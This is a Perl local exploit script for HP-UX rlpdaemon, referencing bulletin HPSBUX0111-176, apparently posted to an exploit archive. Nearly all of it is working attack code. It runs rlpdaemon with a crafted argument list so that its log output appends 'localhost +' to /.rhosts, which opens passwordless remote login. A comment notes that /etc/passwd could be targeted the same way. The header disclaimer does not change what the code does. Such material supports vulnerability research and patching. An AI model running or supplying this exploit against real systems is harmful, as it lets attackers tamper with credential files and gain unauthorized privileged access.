HP-UX rlpdaemon Local .rhosts Append

`#!/opt/perl5/bin/perl -w  
  
# HP-UX rlpdaemon local exploit  
# Bulletin HPSBUX0111-176 (November 2001)  
#  
# For use only on machines where you have legitimate root.  
# This attempts to add junk (including "localhost +") to /.rhosts.  
# Obvious variants could include /etc/passwd.  
  
use IO::Socket;  
  
$PORT = 9000; # pick something not in use  
  
$pid=fork;  
die("fork: $!") unless (defined($pid));  
  
if (0 == $pid) {  
# child - server, exec rlpdaemon with chosen argv  
  
$IPPROTO_TCP=6;  
$SOCK_STREAM=1;  
$AF_INET=2;  
$PF_INET=2;  
  
$sockaddr='S n a4 x8'; # packed socket data  
  
$this=pack($sockaddr, $AF_INET, $PORT, "\0\0\0\0") or die("pack: $!");  
socket(S, $PF_INET, $SOCK_STREAM, $IPPROTO_TCP) || die ("socket: $!");  
bind(S, $this) or die("bind: $!");  
listen(S, 5) or die("listen: $!");  
$addr=accept(NS, S);  
  
# dup2 on 3 standard streams  
open(STDIN, "+<&NS") or die("dup2: $!");  
open(STDOUT, "+>&NS") or die("dup2: $!");  
open(STDERR, "+>&NS") or die("dup2: $!");  
  
exec {"/usr/sbin/rlpdaemon"}  
"\nlocalhost +\n",  
"-i", "-l", "-L", "/.rhosts";  
# UNREACHED  
exit(1);  
}  
  
sleep 5; # let server start before we connect to it  
  
# parent - connect to server with loggable action  
$remote = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => "localhost",  
PeerPort => $PORT  
)  
or die "cannot connect to port $PORT at localhost";  
  
# RFC1179  
printf($remote "%clp\n", 2); # rlpdaemon should log this  
close($remote);  
exit(0);  
`